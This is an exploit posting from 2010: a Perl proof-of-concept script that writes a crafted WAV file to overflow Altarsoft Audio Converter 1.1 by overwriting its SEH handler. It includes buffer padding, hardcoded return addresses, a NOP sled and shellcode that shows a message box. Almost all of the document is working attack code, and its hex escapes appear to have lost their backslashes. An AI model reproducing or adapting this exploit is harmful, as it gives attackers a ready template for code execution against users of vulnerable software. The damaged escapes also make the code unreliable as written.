Altarsoft Audio Converter 1.1 Buffer Overflow
Posted on 17 December 2010
# # # Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH) # Date: 16/12/2010 # Author: C4SS!0 G0M3S # Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe # Version: 111 # Tested on: WIN-XP SP3 PT-BR # CVE: N/A # # #Created By C4SS!0 G0M3S #E-MAIL Louredo_@hotmail.com #Home: http://www.invasao.com.br # # use IO::File; if($#ARGV != 0) { sub usage { system("cls"); system("color 4f"); print " ||=================================================================|| "; print " || || "; print " || Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH) || "; print " || Created BY C4SS!0 G0M3S || "; print " || Contact Louredo_@hotmail.com || "; print " || || "; print " ||=================================================================|| "; print("[+]Exploit: Buffer Overflow Altarsoft Audio Converter 1.1(SEH) "); print("[+]Date: 16/12/2010 "); print("[+]Author: C4SS!0 G0M3S "); print("[+]E-mail: Louredo_@hotmail.com "); print("[+]Home: http://www.invasao.com.br "); print("[+]Version: 2.1 "); print("[+]Impact: Hich "); print("[+]Tested On: WIN-XP SP3 Virtual Box "); } usage; print "[-]Usage: $0 <File Name> "; print "[-]Exemple: $0 music.wav "; exit(0); } $file = $ARGV[0]; $buffer = "x41" x 4128; $eip = pack('V',0x004FCA3F); $nseh = "xebx06x90x90"; $seh = pack('V',0x0042f486); $nops = "x90" x 15; #Shellcode MessageBoxA() my $shellcode = "x33xC0x33xC9x33xD2x33xDBx50x68x6Cx6Cx20x20x68x33x32x2Ex64x68x75x73x65x72x54x58xBBx7Bx1Dx80x7Cx50". "xFFxD3x90x33xD2x52xB9x5Ex67x30xEFx81xC1x11x11x11x11x51x68x61x67x65x42x68x4Dx65x73x73x54x5Ax52x50". "xB9x30xAEx80x7CxFFxD1x33xC9x33xD2x33xDBx51x68x53x20x20x20x68x47x30x4Dx33x68x53x21x30x20x68x20x43". "x34x53x68x64x20x42x79x68x6Fx69x74x65x68x45x78x70x6Cx54x59x53x68x21x30x20x20x68x43x34x53x53x54x5B". "x6Ax40x53x51x52xFFxD0x33xC0x50xBExFAxCAx81x7CxFFxD6"; $payload = $buffer.$eip.$nseh.$seh.$nops.$shellcode; open(f,">$file")or die "ERROR: $! "; print f $payload; close(f); usage; print "[*]Identifying the size Shellcode "; print "[*]The Shellcode Size:".length($shellcode)." "; print "[*]Creating File $file "; print "[*]The File $file Created Successfully ";
